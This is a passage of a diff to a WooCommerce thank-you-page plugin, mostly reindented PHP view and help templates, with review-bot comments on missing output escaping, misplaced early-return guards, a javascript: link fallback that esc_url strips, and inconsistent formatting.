-        echo wp_kses_post( $heading_desc );
+		echo wp_kses_post( $heading_desc );
 		if ( '' !== $billing_email ) {
 			echo '<div class="xlwcty_content xlwcty_clearfix">';
 			echo '<p class="xlwcty_BSpace"><strong>' . esc_html( __( 'Email', 'woocommerce' ) ) . '</strong></p>';
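Review bot: the two "Double-check" guards return `false` from inside markup that is already open: by the time the `show_billing` guard runs, `<div class="xlwcty_Box xlwcty_customer_info">` has been emitted and `echo '<div class="xlwcty_content xlwcty_clearfix">'` has executed, so bailing out there leaves the page with unclosed elements. They are also redundant with the guard added at the top of this file, since nothing between them reassigns `$order_data`. Suggest dropping the inner checks, or, if `$order_data` really can change, resolving that once before any HTML is written.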
@@ -150,51 +165,59 @@
 			echo '</div>';
 		}
 		if ( 'yes' === $this->data->show_billing ) {
+			// Security: Double-check order_data exists before calling methods
+			if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+				return false;
+			}
 			$billing_address     = $order_data->get_formatted_billing_address();
 			$billing_address_raw = $order_data->get_address();
 			$contact_name        = trim( $billing_address_raw['first_name'] . ' ' . $billing_address_raw['last_name'] );
-			$contact_name       .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';
+			$contact_name        .= ( $billing_address_raw['company'] ) ? '<br/>' . $billing_address_raw['company'] : '';

 			$contact_name = apply_filters( 'xlwcty_customer_info_contact_name', $contact_name, $billing_address_raw );

 			if ( ! empty( $billing_address ) ) {
 				?>
-				<div class="xlwcty_content xlwcty_clearfix">
-					<p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Billing address', 'woocommerce' ) ); ?></strong></p>
-					<p>
+                <div class="xlwcty_content xlwcty_clearfix">
+                    <p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Billing address', 'woocommerce' ) ); ?></strong></p>
+                    <p>
 						<?php
 						echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 						echo wp_kses_post( $billing_address );
 						?>
-					</p>
-				</div>
+                    </p>
+                </div>
 				<?php
 			}
 		}
 		if ( 'yes' === $this->data->show_shipping ) {
+			// Security: Double-check order_data exists before calling methods
+			if ( empty( $order_data ) || ! is_object( $order_data ) ) {
+				return false;
+			}
 			$shipping_address     = $order_data->get_formatted_shipping_address();
 			$shipping_address_raw = $order_data->get_address( 'shipping' );
 			$contact_name         = trim( $shipping_address_raw['first_name'] . ' ' . $shipping_address_raw['last_name'] );
-			$contact_name        .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
+			$contact_name         .= ( $shipping_address_raw['company'] ) ? '<br/>' . $shipping_address_raw['company'] : '';
 			$contact_name         = apply_filters( 'xlwcty_customer_info_contact_name', $contact_name, $shipping_address_raw );

 			if ( ! empty( $shipping_address ) ) {
 				?>
-				<div class="xlwcty_content xlwcty_clearfix">
-					<p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
-					<p>
+                <div class="xlwcty_content xlwcty_clearfix">
+                    <p class="xlwcty_BSpace"><strong><?php echo esc_html( __( 'Shipping address', 'woocommerce' ) ); ?></strong></p>
+                    <p>
 						<?php
 						echo $contact_name ? wp_kses_post( $contact_name ) . '<br/>' : '';
 						echo wp_kses_post( $shipping_address );
 						?>
-					</p>
-				</div>
+                    </p>
+                </div>
 				<?php
 			}
 		}
-        echo wp_kses_post( $after_desc );
+		echo wp_kses_post( $after_desc );
 		?>
-	</div>
+    </div>
 	<?php
 }
 remove_filter( 'woocommerce_order_formatted_billing_address', array( $this, 'xlwcty_format_billing_address' ), 11 );
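Review bot: same problem as the previous hunk: both `return false` guards sit after `<div class="xlwcty_Box xlwcty_customer_info xlwcty_info_full_width">` has been opened and duplicate the file-level check, so they can be removed without losing the protection the top-of-file guard provides.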
--- a/woo-thank-you-page-nextmove-lite/components/html/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/html/help.php
@@ -1,25 +1,25 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/html/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Description:</strong> Enter any text here. This is a WYSWYG editor, You can use any tinymce property or add shortcodes etc.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/html/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Description:</strong> Enter any text here. This is a WYSWYG editor, You can use any tinymce property or add shortcodes etc.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
+<?php
+return ob_get_clean();
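Review bot: `$config['slug']` is echoed unescaped inside the `id="..."` attribute and `$config['title']` is echoed unescaped inside `<h3>`; since this rewrite already touches every line of the file, wrap them in `esc_attr()` and `esc_html()` to match the escaping the view files in this patch apply to their output. The rest of the hunk is a tabs-to-four-spaces reindent that marks the entire file as changed; a formatting-only commit would keep the functional change reviewable. Minor: 'WYSWYG' in the Description row should read 'WYSIWYG'.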
--- a/woo-thank-you-page-nextmove-lite/components/html/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/html/instance.php
@@ -5,12 +5,12 @@
 class XLWCTY_Text extends XLWCTY_Component {

 	private static $instance = null;
-	public $is_disable       = true;
-	public $viewpath         = '';
-	public $html_content     = '';
-	public $is_multiple      = true;
-	public $component_limit  = 1;
-	public $script           = '';
+	public $is_disable = true;
+	public $viewpath = '';
+	public $html_content = '';
+	public $is_multiple = true;
+	public $component_limit = 1;
+	public $script = '';

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/html/views/view.php
+++ b/woo-thank-you-page-nextmove-lite/components/html/views/view.php
@@ -2,21 +2,21 @@
 defined( 'ABSPATH' ) || exit;

 if ( '' !== $this->data->html_content || '' !== $this->data->heading ) {
-    XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
-    ?>
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
+	?>
     <div class="xlwcty_Box xlwcty_textBox <?php echo 'xlwcty_textBox_1'; ?>">
-        <?php
-        $heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
-        echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
-        $html_content_parsed = $this->data->html_content ? apply_filters( 'xlwcty_the_content', $this->data->html_content ) : '';
-        // Unfiltered HTML output is intentional for this component.
-        // This enables embedding third-party forms (Gravity Forms, WPForms), scripts, and iframes.
-        // Security: Content is only editable by users with manage_woocommerce capability via the admin page builder.
-        // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
-        echo $html_content_parsed ? '<div class="xlwcty_content">' . $html_content_parsed . '</div>' : '';
-        ?>
+		<?php
+		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
+		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
+		$html_content_parsed = $this->data->html_content ? apply_filters( 'xlwcty_the_content', $this->data->html_content ) : '';
+		// Unfiltered HTML output is intentional for this component.
+		// This enables embedding third-party forms (Gravity Forms, WPForms), scripts, and iframes.
+		// Security: Content is only editable by users with manage_woocommerce capability via the admin page builder.
+		// phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped
+		echo $html_content_parsed ? '<div class="xlwcty_content">' . $html_content_parsed . '</div>' : '';
+		?>
     </div>
-    <?php
+	<?php
 } else {
-    XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Data not set', 'woo-thank-you-page-nextmove-lite' ) ) );
+	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Data not set', 'woo-thank-you-page-nextmove-lite' ) ) );
 }
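Review bot: the reindent leaves the `phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped` line and its justification untouched, and that justification ('Content is only editable by users with manage_woocommerce capability via the admin page builder') is a claim about the save path, which is not part of this diff. A reviewer should be able to follow the claim to the capability check that enforces it, so name the saving function in the comment; an unescaped `echo` whose safety rests on code elsewhere needs that pointer more than most.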
--- a/woo-thank-you-page-nextmove-lite/components/image-content/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/help.php
@@ -1,36 +1,36 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/image-content/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Layout:</strong> Plugin has 4 layouts `Single Image`, `Two Images`, `Left Image Text` & `Text Right Image`.<br/>Single Image - This has a single image upload and link
-					option.<br/>Two Images - Two Images with link in 50/50 ratio.<br/>Left Image Text - Choose Image Content ratio with other options to add image, link and text.<br/>Text Right Image
-					- Choose Image Content ratio with other options to add image, link and text.
-				</td>
-			</tr>
-			<tr>
-				<td>4.</td>
-				<td><strong>Button:</strong> If you wish to display button, choose 'Yes' option. Further has link option with other CSS options.</td>
-			</tr>
-			<tr>
-				<td>5.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/image-content/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Layout:</strong> Plugin has 4 layouts `Single Image`, `Two Images`, `Left Image Text` & `Text Right Image`.<br/>Single Image - This has a single image upload and link
+                    option.<br/>Two Images - Two Images with link in 50/50 ratio.<br/>Left Image Text - Choose Image Content ratio with other options to add image, link and text.<br/>Text Right Image
+                    - Choose Image Content ratio with other options to add image, link and text.
+                </td>
+            </tr>
+            <tr>
+                <td>4.</td>
+                <td><strong>Button:</strong> If you wish to display button, choose 'Yes' option. Further has link option with other CSS options.</td>
+            </tr>
+            <tr>
+                <td>5.</td>
+                <td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
+            </tr>
+        </table>
+    </div>
+<?php
+return ob_get_clean();
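Review bot: as in the other help.php files in this patch, `echo $config['slug']` inside the `id` attribute and `echo $config['title']` inside `<h3>` are output without `esc_attr()`/`esc_html()`; since every line is rewritten anyway, add the escaping here. The Layout row also wraps mid-sentence across three source lines inside one `<td>`, which the reindent preserved; one source line per `<br/>`-separated item would read cleaner.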
--- a/woo-thank-you-page-nextmove-lite/components/image-content/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/instance.php
@@ -6,9 +6,9 @@

 	private static $instance = null;
 	public $instance_campaign_data;
-	public $is_disable      = true;
-	public $viewpath        = '';
-	public $is_multiple     = true;
+	public $is_disable = true;
+	public $viewpath = '';
+	public $is_multiple = true;
 	public $component_limit = 1;

 	public function __construct( $order = false ) {
@@ -93,7 +93,7 @@
 			}
 			if ( $this->data->btn_bg_color != '' ) {
 				$style['.xlwcty_wrap .xlwcty_Box.xlwcty_imgBox.xlwcty_imgBox_1 .xlwcty_btn']['background'] = $this->data->btn_bg_color;
-				$rgba = XLWCTY_Common::hex2rgb( $this->data->btn_bg_color, true );
+				$rgba                                                                                      = XLWCTY_Common::hex2rgb( $this->data->btn_bg_color, true );
 				if ( $rgba != '' ) {
 					$style['.xlwcty_wrap .xlwcty_Box.xlwcty_imgBox.xlwcty_imgBox_1 .xlwcty_btn:hover']['background'] = "rgba({$rgba},0.70)";
 				}
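Review bot: the `$rgba` assignment is padded with roughly ninety spaces so that its `=` lines up with the long `$style[...]['background']` assignment above it, while the first hunk of this same file removes the alignment from the property declarations (`public $is_disable = true;` and friends); pick one convention. Aligning against an array key that long produces an unreadable line, so drop the padding here (`$rgba = XLWCTY_Common::hex2rgb( $this->data->btn_bg_color, true );`) and, if aligned assignments are wanted, keep them for the short property block instead.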
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/2c.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/2c.php
@@ -17,7 +17,7 @@
 	<?php
 	$heading_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->heading );
 	?>
-	<div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
+    <div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
 	<?php
 	$desc_class = '';
 	if ( ! empty( $this->data->desc_alignment ) ) {
@@ -26,42 +26,42 @@
 	$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 	echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 	?>
-	<div class="xlwcty_imgBox_w xlwcty_imgBox_2cw xlwcty_clearfix">
+    <div class="xlwcty_imgBox_w xlwcty_imgBox_2cw xlwcty_clearfix">
 		<?php
 		if ( $source_left != '' ) {
 			$left_img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $left_image_link );
 			?>
-			<div class="xlwcty_content xlwcty_center xlwcty_50" data-style="left">
+            <div class="xlwcty_content xlwcty_center xlwcty_50" data-style="left">
 				<?php
 				printf( "<a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a>", esc_url( $left_img_link_parsed ), esc_url( $source_left ) );
 				?>
-			</div>
+            </div>
 			<?php
 		}
 		if ( $source_right != '' ) {
 			$right_img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $right_image_link );
 			?>
-			<div class="xlwcty_content xlwcty_center xlwcty_50" data-style="right">
+            <div class="xlwcty_content xlwcty_center xlwcty_50" data-style="right">
 				<?php
 				printf( "<a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a>", esc_url( $right_img_link_parsed ), esc_url( $source_right ) );
 				?>
-			</div>
+            </div>
 			<?php
 		}
 		?>
-	</div>
+    </div>
 	<?php
 	if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 		$btn_link        = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 		$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 		$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 		?>
-		<div class="xlwcty_clear_20"></div>
-		<div class="xlwcty_clearfix xlwcty_center">
-			<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+        <div class="xlwcty_clear_20"></div>
+        <div class="xlwcty_clearfix xlwcty_center">
+            <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 				<?php echo wp_kses_post( $btn_text_parsed ); ?>
-			</a>
-		</div>
+            </a>
+        </div>
 		<?php
 	}
 	?>
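Review bot: on the unchanged `$btn_link` line, `! empty( $this->data->btn_link ) != ''` compares a boolean with an empty string; it only behaves because PHP's loose comparison evaluates `false != ''` as false, and it reads as a mistake. Since the hunk already re-indents this block, simplify to `$btn_link = ! empty( $this->data->btn_link ) ? $this->data->btn_link : 'javascript:void(0)';`. The same expression appears in the full, left-image and right-image views in this patch.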
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/full.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/full.php
@@ -6,12 +6,12 @@
 if ( $source != '' ) {
 	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'On', 'woo-thank-you-page-nextmove-lite' ) ) );
 	?>
-	<div class="xlwcty_Box xlwcty_imgBox <?php echo 'xlwcty_imgBox_1'; ?>">
+    <div class="xlwcty_Box xlwcty_imgBox <?php echo 'xlwcty_imgBox_1'; ?>">
 		<?php
 		$heading_parsed = $this->data->heading ? XLWCTY_Common::maype_parse_merge_tags( $this->data->heading ) : '';
 		echo $heading_parsed ? '<div class="xlwcty_title">' . wp_kses_post( $heading_parsed ) . '</div>' : '';
 		?>
-		<div class="xlwcty_content">
+        <div class="xlwcty_content">
 			<?php
 			$desc_class = '';
 			if ( ! empty( $this->data->desc_alignment ) ) {
@@ -20,32 +20,32 @@
 			$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 			echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 			?>
-			<div class="xlwcty_imgBox_w xlwcty_clearfix">
+            <div class="xlwcty_imgBox_w xlwcty_clearfix">
 				<?php
 				$img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $full_image_link );
 				printf( "<p class='xlwcty_center'><a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a></p>", esc_url( $img_link_parsed ), esc_url( $source ) );
 				?>

-			</div>
+            </div>
 			<?php
 			if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 				$btn_link = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 				?>
-				<div class="xlwcty_clear_20"></div>
-				<div class="xlwcty_clearfix xlwcty_center">
+                <div class="xlwcty_clear_20"></div>
+                <div class="xlwcty_clearfix xlwcty_center">
 					<?php
 					$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 					$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 					?>
-					<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+                    <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 						<?php echo wp_kses_post( $btn_text_parsed ); ?>
-					</a>
-				</div>
+                    </a>
+                </div>
 				<?php
 			}
 			?>
-		</div>
-	</div>
+        </div>
+    </div>
 	<?php
 } else {
 	XLWCTY_Core()->public->add_header_logs( sprintf( '%s - %s', $this->get_component_property( 'title' ), __( 'Data not set', 'woo-thank-you-page-nextmove-lite' ) ) );
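Review bot: the `'javascript:void(0)'` fallback on the `$btn_link` line never reaches the page: the value goes through `esc_url()` in `<a href="<?php echo esc_url( $btn_link_parsed ); ?>"`, and `esc_url()` returns an empty string for a `javascript:` URL because that scheme is not in `wp_allowed_protocols()`, so the button renders as `href=""` and reloads the current page when clicked. Use `'#'` as the fallback, or skip the `<a>` when no link is configured; the same fallback is used in the 2c, left-image and right-image views. Minor: the blank line before `</div>` inside the `xlwcty_imgBox_w` wrapper looks accidental.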
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/left-image.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/left-image.php
@@ -27,7 +27,7 @@
 	<?php
 	$heading_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->heading );
 	?>
-	<div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
+    <div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
 	<?php
 	$desc_class = '';
 	if ( ! empty( $this->data->desc_alignment ) ) {
@@ -36,32 +36,32 @@
 	$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 	echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 	?>
-	<div class="xlwcty_imgBox_w xlwcty_clearfix">
-		<div class="xlwcty_content xlwcty_center <?php echo esc_attr( $left_class ); ?>" data-style="left">
+    <div class="xlwcty_imgBox_w xlwcty_clearfix">
+        <div class="xlwcty_content xlwcty_center <?php echo esc_attr( $left_class ); ?>" data-style="left">
 			<?php
 			$left_img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $left_image_link );
 			printf( "<p><a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a></p>", esc_url( $left_img_link_parsed ), esc_url( $source_left ) );
 			?>
-		</div>
-		<div class="xlwcty_content <?php echo esc_attr( $right_class ); ?>" data-style="right">
+        </div>
+        <div class="xlwcty_content <?php echo esc_attr( $right_class ); ?>" data-style="right">
 			<?php
 			$content_parsed = apply_filters( 'xlwcty_the_content', $content );
 			echo wp_kses_post( $content_parsed );
 			?>
-		</div>
-	</div>
+        </div>
+    </div>
 	<?php
 	if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 		$btn_link        = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 		$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 		$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 		?>
-		<div class="xlwcty_clear_20"></div>
-		<div class="xlwcty_clearfix xlwcty_center">
-			<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+        <div class="xlwcty_clear_20"></div>
+        <div class="xlwcty_clearfix xlwcty_center">
+            <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 				<?php echo wp_kses_post( $btn_text_parsed ); ?>
-			</a>
-		</div>
+            </a>
+        </div>
 		<?php
 	}
 	?>
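Review bot: the reindent is inconsistent within the hunk: the opening and closing `<div>` lines move to four-space indentation, but the `<?php` blocks and `<?php echo wp_kses_post( $btn_text_parsed ); ?>` between them keep tabs, so every nested level alternates between tabs and spaces; reindent the whole view one way. The `$btn_link` line also repeats the `! empty( ... ) != ''` boolean-to-string comparison used in the other image-content views.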
--- a/woo-thank-you-page-nextmove-lite/components/image-content/views/right-image.php
+++ b/woo-thank-you-page-nextmove-lite/components/image-content/views/right-image.php
@@ -26,7 +26,7 @@
 	<?php
 	$heading_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->heading );
 	?>
-	<div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
+    <div class="xlwcty_title"><?php echo wp_kses_post( $heading_parsed ); ?></div>
 	<?php
 	$desc_class = '';
 	if ( ! empty( $this->data->desc_alignment ) ) {
@@ -35,38 +35,38 @@
 	$desc_parsed = $this->data->desc ? apply_filters( 'xlwcty_the_content', $this->data->desc ) : '';
 	echo $desc_parsed ? '<div' . $desc_class . '>' . wp_kses_post( $desc_parsed ) . '</div>' : '';
 	?>
-	<div class="xlwcty_imgBox_w xlwcty_clearfix">
+    <div class="xlwcty_imgBox_w xlwcty_clearfix">
 		<?php
 		if ( $content != '' ) {
 			?>
-			<div class="xlwcty_content <?php echo esc_attr( $left_class ); ?>" data-style="left">
+            <div class="xlwcty_content <?php echo esc_attr( $left_class ); ?>" data-style="left">
 				<?php
 				$content_parsed = apply_filters( 'xlwcty_the_content', $content );
 				echo wp_kses_post( $content_parsed );
 				?>
-			</div>
+            </div>
 			<?php
 		}
 		?>
-		<div class="xlwcty_content xlwcty_center <?php echo esc_attr( $right_class ); ?>" data-style="right">
+        <div class="xlwcty_content xlwcty_center <?php echo esc_attr( $right_class ); ?>" data-style="right">
 			<?php
 			$img_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $left_image_link );
 			printf( "<p><a href='%s' class='xlwcty_content_block_image_link'><img src='%s' class='xlwcty_content_block_image'/></a></p>", esc_url( $img_link_parsed ), esc_url( $source_left ) );
 			?>
-		</div>
-	</div>
+        </div>
+    </div>
 	<?php
 	if ( $this->data->show_btn == 'yes' && $this->data->btn_text != '' ) {
 		$btn_link        = ! empty( $this->data->btn_link ) != '' ? $this->data->btn_link : 'javascript:void(0)';
 		$btn_link_parsed = XLWCTY_Common::maype_parse_merge_tags( $btn_link );
 		$btn_text_parsed = XLWCTY_Common::maype_parse_merge_tags( $this->data->btn_text );
 		?>
-		<div class="xlwcty_clear_20"></div>
-		<div class="xlwcty_clearfix xlwcty_center">
-			<a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
+        <div class="xlwcty_clear_20"></div>
+        <div class="xlwcty_clearfix xlwcty_center">
+            <a href="<?php echo esc_url( $btn_link_parsed ); ?>" class="xlwcty_btn">
 				<?php echo wp_kses_post( $btn_text_parsed ); ?>
-			</a>
-		</div>
+            </a>
+        </div>
 		<?php
 	}
 	?>
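Review bot: the right-hand image column (`data-style="right"`) reads its source and link from `$source_left` and `$left_image_link`, so in this view the variable names describe the opposite side from where the image is rendered; since the block is being rewritten anyway, rename them to side-neutral names (`$source`, `$image_link`) or add a comment stating why the left-hand fields are reused here, otherwise the next reader will assume a copy-paste bug.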
--- a/woo-thank-you-page-nextmove-lite/components/join-us/instance.php
+++ b/woo-thank-you-page-nextmove-lite/components/join-us/instance.php
@@ -5,8 +5,8 @@
 class XLWCTY_Social_Sharing extends XLWCTY_Component {

 	private static $instance = null;
-	public $viewpath         = '';
-	public $is_disable       = true;
+	public $viewpath = '';
+	public $is_disable = true;

 	public function __construct( $order = false ) {
 		parent::__construct();
--- a/woo-thank-you-page-nextmove-lite/components/map/help.php
+++ b/woo-thank-you-page-nextmove-lite/components/map/help.php
@@ -1,33 +1,33 @@
-<?php
-defined( 'ABSPATH' ) || exit;
-
-ob_start();
-?>
-	<div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
-		<h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
-		<p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/map/help.jpg'; ?>"/></p>
-		<table align="center" width="650" class="xlwcty_modal_table">
-			<tr>
-				<td width="50">1.</td>
-				<td><strong>Map:</strong> You can select map style (choose from 8 styles), zoom level, marker address and marker icon.</td>
-			</tr>
-			<tr>
-				<td>2.</td>
-				<td><strong>Marker Text:</strong> Enter text you want to display inside your marker window.</td>
-			</tr>
-			<tr>
-				<td>3.</td>
-				<td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
-			</tr>
-			<tr>
-				<td>4.</td>
-				<td><strong>Description:</strong> Enter any text here. Alignment option available here.</td>
-			</tr>
-			<tr>
-				<td>5.</td>
-				<td><strong>Border:</strong> You can add any border style, manage width or color. Or if you want to disable the border, choose border style option 'none'.</td>
-			</tr>
-		</table>
-	</div>
-<?php
-return ob_get_clean();
+<?php
+defined( 'ABSPATH' ) || exit;
+
+ob_start();
+?>
+    <div style="display:none;" class="xlwcty_tb_content" id="xlwcty_component_settings<?php echo $config['slug']; ?>_help">
+        <h3><?php echo $config['title'] . ' ' . __( 'Component Design & Settings', 'woo-thank-you-page-nextmove-lite' ); ?></h3>
+        <p class="xlwcty_center"><img src="<?php echo plugin_dir_url( XLWCTY_PLUGIN_FILE ) . 'components/map/help.jpg'; ?>"/></p>
+        <table align="center" width="650" class="xlwcty_modal_table">
+            <tr>
+                <td width="50">1.</td>
+                <td><strong>Map:</strong> You can select map style (choose from 8 styles), zoom level, marker address and marker icon.</td>
+            </tr>
+            <tr>
+                <td>2.</td>
+                <td><strong>Marker Text:</strong> Enter text you want to display inside your marker window.</td>
+            </tr>
+            <tr>
+                <td>3.</td>
+                <td><strong>Heading:</strong> Enter any heading. Customize font size and text alignment too.</td>
+            </tr>
